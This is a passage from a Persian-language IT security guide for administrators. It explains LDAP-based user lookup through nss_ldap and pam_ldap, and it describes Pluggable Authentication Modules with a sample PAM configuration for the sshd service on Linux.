‫ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﭼﻨﺪﺍﻥ ﻛﺎﺭﺁ ﻧﻴﺴﺖ‪ .‬ﺩﺭﻋﻮﺽ ﺩﻭ ﺭﻭﺵ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﻛـﻪ ﺑﻌﻨـﻮﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻣﺘﻦﺑﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ‪ PADL Software‬ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻭ ﺩﺭ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻌﻬﺎﻱ ‪ Linux‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺭﻭﺵ ﺍﻭﻝ ‪nss_ldap‬‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻮﺍﺑﻊ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ‪) C‬ﻣﺜﻞ )(‪ (getpwentc‬ﺭﺍ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺼﻮﺭﺕ ﻧﺎﻣﺮﺋﻲ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ‬
‫ﺩﺍﺩﻩ ‪ LDAP‬ﺑﺠﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺤﻠﻲ‪ ،NIS ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻗﺒﻞ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺗﻮﺍﺑـﻊ ﺭﺍ ﺑـﺮﺍﻱ‬
‫‪١٨٧‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻓﺎﻳﻞ ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﺳﺮﻭﻳﺲ‪) ١٨٦‬ﻣﻌﻤﻮ ﹰﻻ ‪ (/etc/nsswitch.conf‬ﻣﺠﺎﺯ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ‪.‬‬
‫ﺭﻭﺵ ﺩﻭﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼـﺎﺭﭼﻮﺏ ‪ PAM‬ﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﺑﺤـﺚ ﻣـﻲﺷـﻮﺩ‪ .‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ‪ LDAP‬ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣـﺎﺟﻮﻝ ‪،PAM‬‬
‫‪ ،pam_ldap‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻼﻑ ‪ pam_ldap ،libnss_ldap‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ‪ LDAP‬ﺗﻨﻬﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺩﻳﮕـﺮﻱ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻧﻤـﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪ LDAP‬ﺷـﻤﺎ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻲ ﺍﺿـﺎﻓﻪ‬
‫‪ nis.schema‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ LDAP‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻛﻨﺘﺮﻝﺷﺪﻩ ﺑﻮﺳـﻴﻠﺔ ‪ ،PAM‬ﺑـﻪ ﺳـﺎﺩﮔ ﹺ‬
‫ﻛﺮﺩﻥ ﻳﻚ ﺧﻂ ﺑﻪ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺁﻥ ﺍﺳﺖ‪ ،‬ﻛﻪ ‪ pam_ldap.so‬ﺭﺍ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻭ‬
‫ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺑﻌﻨﻮﺍﻥ "ﻛﺎﻓﻲ" ﻣﺸﺨﺺ ﻛﻨﺪ‪.‬‬
‫ﻣﺎﺟﻮﻝﻫﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﺷﻴﻮﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ‬
‫ﺑﺎﺷﻴﻢ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺳﻴﺴﺘﻢ ﻣﺎﺟﻮﻟﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫)‪ (PAMs‬ﻳﻚ ﺭﻭﺵ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺍﺳﺖ‪ PAM .‬ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﻮﺳﻴﻠﺔ ‪ SUN‬ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺁﻥ ﺑﺮﺍﻱ ‪ ،Free BSD ،Solaris‬ﻭ‬
‫ﺑﺨﺼﻮﺹ ‪ Linux‬ﺑﻴﺸﺘﺮﻳﻦ ‪PAM‬ﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ PAM .‬ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻭ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻫﺮ ﺑﺮﻧﺎﻣﺔ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺑﺠﺎﻱ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﻫﺮ ﺳﻴـﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ‪ PAM‬ﺁﻧـﺮﺍ‬
‫ﻣﻲﺷﻨﺎﺳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺎﺟﻮﻝ ‪ PAM‬ﻭ ﺩﺭ ﻋﻤﻞ ﺑﺼﻮﺭﺕ ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﺔ ﻣﺸﺘﺮﮎ ‪ -‬ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻳﻨﺎﻣﻴﻜﻲ ﺑﺎﺭﮔﺬﺍﺭﻱﺷﺪﻩ ‪ -‬ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻣﺎﺟﻮﻟﻬﺎﻱ ‪ PAM‬ﺍﺯ ﻃﺮﻕ ﺯﻳﺮ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪:‬‬
‫• ﻓﺎﻳﻠﻬﺎﻱ ‪ etc/passwd‬ﻳﺎ ‪etc/shadow‬؛‬
‫• ‪ NIS‬ﻳﺎ ‪NIS+‬؛‬
‫‪١٨٨‬‬
‫)‪185 Application Programming Interface (API‬‬
‫‪186 Name Service Switch‬‬
‫‪ ۱۸۷‬ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ libnss-ldap‬ﺑﻪ ﺻﻔﺤﺎﺕ ‪ ۴۵۰‬ﺗﺎ ‪ ۴۵۳‬ﮐﺘﺎﺏ ‪ PUIS‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪188 Pluggable Authentication Modules‬‬
‫‪٣٤٥‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫•‬
‫‪LDAP‬؛‬
‫•‬
‫‪ Kerberos 4‬ﻳﺎ ‪Kerberos 5‬؛ ﻭ‬
‫ﻳﻚ ﻓﺎﻳﻞ ﺩﻟﺨﻮﺍﻩ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ‪.Berkeley‬‬
‫•‬
‫‪١٨٩‬‬
‫ﻫﺮ ﺳﺮﻭﻳﺲ ﺁﺷﻨﺎ ﺑﺎ ‪ PAM‬ﻳﺎ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/pam.conf‬ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻣﻌﻤﻮﻝﺗﺮ ﺩﺭ ﻓﺎﻳﻞ ﺧﻮﺩﺵ ﺩﺭ ﻣﺴﻴﺮ ‪ /etc/pam.d‬ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ ssh‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ‪ ،Linux‬ﻓﺎﻳـﻞ ‪ /etc/pam.d/sshd‬ﺍﺳـﺖ‪.‬‬
‫ﻼ ﻣﺜـﺎﻟﻲ‬
‫ﻳﻚ ﺳﺮﻭﻳﺲ ﺑﻨﺎﻡ "‪ "other‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺑﻪ ﺧﺪﻣﺎﺕ ﺁﺷﻨﺎ ﺑﺎ ‪ PAM‬ﻛﻪ ﺻﺮﺍﺣﺘﹰﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩﺍﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺫﻳـ ﹰ‬
‫ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺑﺮﺍﻱ ‪ sshd‬ﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Linux‬ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪auth required /lib/security/pam_env.so‬‬
‫‪auth sufficient /lib/security/pam_unix.so‬‬
‫‪auth required /lib/security/pam_deny.so‬‬
‫‪account required /lib/security/pam_unix.so‬‬
‫‪password required /lib/security/pam_cracklib.so retry=3‬‬
‫‪password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow‬‬
‫‪password required /lib/security/pam_deny.so‬‬
‫‪session required /lib/security/pam_limits.so‬‬
‫‪session required /lib/security/pam_unix.so‬‬
‫ﺐ ﺩﺍﺩﻩﺷﺪﻩ ﺩﻧﺒﺎﻝ ﻣﻲﺷـﻮﺩ‪ .‬ﻣﺎﺟﻮﻟﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺎ‬
‫ﺧﻄﻮﻁ "‪ "auth‬ﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﻪ ﺗﺮﺗﻴ ﹺ‬
‫"‪) "required‬ﻻﺯﻡ( ﻣﺸﺨﺺ ﺷﺪﻩﺍﻧﺪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ‪ -‬ﻭ ﺍﮔﺮ ﺩﺭ ﺍﺟﺮﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷﻮﻧﺪ‪ ،‬ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻧﺸﺪﻩ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺍﻭ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻣﻲﺗﻮﺍﻥ ﻣﺎﺟﻮﻟﻬﺎﻱ "‪ "required‬ﺭﺍ ﺑﺼﻮﺭﺕ ﭼﻨﺪﮔﺎﻧـﻪ ﺗﻌﺮﻳـﻒ‬
‫ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﻛﻠﻴﺔ ﻣﺎﺟﻮﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪ .‬ﻣﺎﺟﻮﻟﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ "‪) "sufficient‬ﻛـﺎﻓﻲ( ﻣـﺸﺨﺺ ﺷـﺪﻩﺍﻧـﺪ‪،‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺟﺮﺍﻳﺸﺎﻥ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ ﻭ ﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺧﺎﺗﻤﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻓﺎﻳﻞ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﻤﭽﻨﻴﻦ ﻫﻤﺔ ﻗﻮﺍﻧﻴﻦ ﺳﻴﺴﺘﻢ ﻣﺒﻨﻲ ﺑﺮ ﻣﺴﻦ ﻳﺎ ﻣﻨﻘﻀﻲ ﺷﺪﻥ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑـﺮﺍﻱ‬
‫ﻣﻨﺎﺑﻊ ﺩﺭ ﻧﺸﺴﺖ ‪ sshd‬ﻛﺎﺭﺑﺮ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﺍﮔﺮ ‪ sshd‬ﻗﺎﺑﻠﻴﺖ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻓﺎﻳـﻞ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺍﺯ‬
‫ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻗﺎﺑﻞ ﺣﺪﺱ ﺯﺩﻥ ﺑﺎﺷـﺪ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ‬
‫‪ /etc/shadow‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﺎﺑﻊ ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ MD5‬ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺯﻳﺮﺳﻴﺴﺘﻢ ‪ PAM‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﭼﻨﺪ ﺻﻮﺭﺕ ﻣﺨﺘﻠﻒ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺩﻭ ﻳﺎ ﺳﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﻛﺮﺩ‪ ١٩٠،‬ﻳﻚ ﺭﻭﺵ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺗﺮﻛﻴﺐ ﻧﻤﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﻣـﺎﻥ ﺭﻭﺯ‬
‫‪ ۱۸۹‬ﺍﮔﺮ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ SMTP‬ﺩﺭ ‪ Sendmail‬ﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻨﺪﻭﻗﻬﺎﻱ ﭘـﺴﺘﻲ‬
‫ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ ،Cyrus imapd‬ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪) Cyrus SASL‬ﻻﻳـﺔ ﺳـﺎﺩﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ ﺍﻣﻨﻴـﺖ‪،‬‬
‫‪ (security layer‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺠﺰﺍ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ‪ PAM‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ! ﻏﻴﺮﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﻴﺴﺖ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺗﺼﺎﻝ ‪ imap‬ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ‪ SASL‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ PAM‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ LDAP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪simple authentication and‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺩﺭ ﺍﻳــﻦ ﻣﺜــﺎﻝ ﺍﻭﻟــﻴﻦ ﻣــﺎﺟﻮﻟﻲ ﻛــﻪ ﺍﺟــﺮﺍ ﻣــﻲﺷــﻮﺩ ‪ pam_env‬ﺍﺳــﺖ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺍﺧﺘﻴــﺎﺭﻱ ﻣﺘﻐﻴﺮﻫــﺎﻱ ﻣﺤﻴﻄــﻲ ﺭﺍ ﺩﺭ‬
‫ﻦ ﻣﻘﺪﺍﺭ ﻳﺎ ﭘﺎﻙ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺎﺟﻮﻝ "ﻻﺯﻡ" ﺍﺳﺖ ‪ -‬ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷـﻮﺩ ﺗـﺎ‬
‫‪ /etc/security/pam_env.conf‬ﺗﻌﻴﻴ ﹺ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺑﺮﺳﺪ‪ .‬ﻣﺎﺟﻮﻝ ﺍﺟﺮﺍ ﺷﻮﻧﺪﺓ ﺑﻌﺪﻱ ‪ pam_unix‬ﺍﺳﺖ ﻛﻪ ﺑـﺎ ﻓﺎﻳﻠﻬـﺎﻱ ﺭﻣـﺰ ﻋﺒـﻮﺭ ‪ /etc/passwd - Unix‬ﻭ‬
‫‪ - etc/shadow‬ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﻋﻤﻠﻴﺎﺕ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛـﺎﺭﺑﺮ ﻛـﺎﻓﻲ‬
‫ﺍﺳﺖ ﻭ ﺭﻭﺍﻝ ﻛﺎﻣﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺁﺧﺮﻳﻦ ﻣﺎﺟﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ pam_deny‬ﺍﺳﺖ ﻛﻪ ﻓﻘﻂ ﺑﻪ ﺷﻜﺴﺖ ﻣﻲﺍﻧﺠﺎﻣﺪ ﺗﺎ ﺑـﻪ ﺭﻭﺍﻝ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻧﺎﻣﻮﻓﻖ ﭘﺎﻳﺎﻥ ﺩﻫﺪ‪.‬‬
‫‪٣٤٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ‪.‬‬
‫‪ PAM‬ﺑﻪ ﺭﺍﻫﺒﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺘﺨﺎﺏ ﺳﻴﺎﺳﺖ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻧﺤﻮ‪ ،‬ﻣﺨﺎﻃﺮﻩ ﻭ ﻓﻨﺎﻭﺭﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺗﻄﺒﻴـﻖ‬
‫ﺩﻫﺪ‪.‬‬
‫‪ - PAM‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﺭﻭﺷﻦ ﻛﺮﺩﻧﺪ ‪ -‬ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻫﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺻﺮﻓﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ‪ .‬ﻳﻜـﻲ ﺍﺯ ﻧﻘـﺎﻁ‬
‫ﻗﻮﺕ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺭﻭﺷﻨﻲ ﭼﻬﺎﺭ ﻓﺎﺯ ﻭ ﺭﻭﺍﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ‪ :‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﺩﺭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﻭ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺩﺍﺭﺩ )ﻓـﺎﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ(‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ )ﻓـﺎﺯ ﺗـﺼﺪﻳﻖ(‪،‬‬
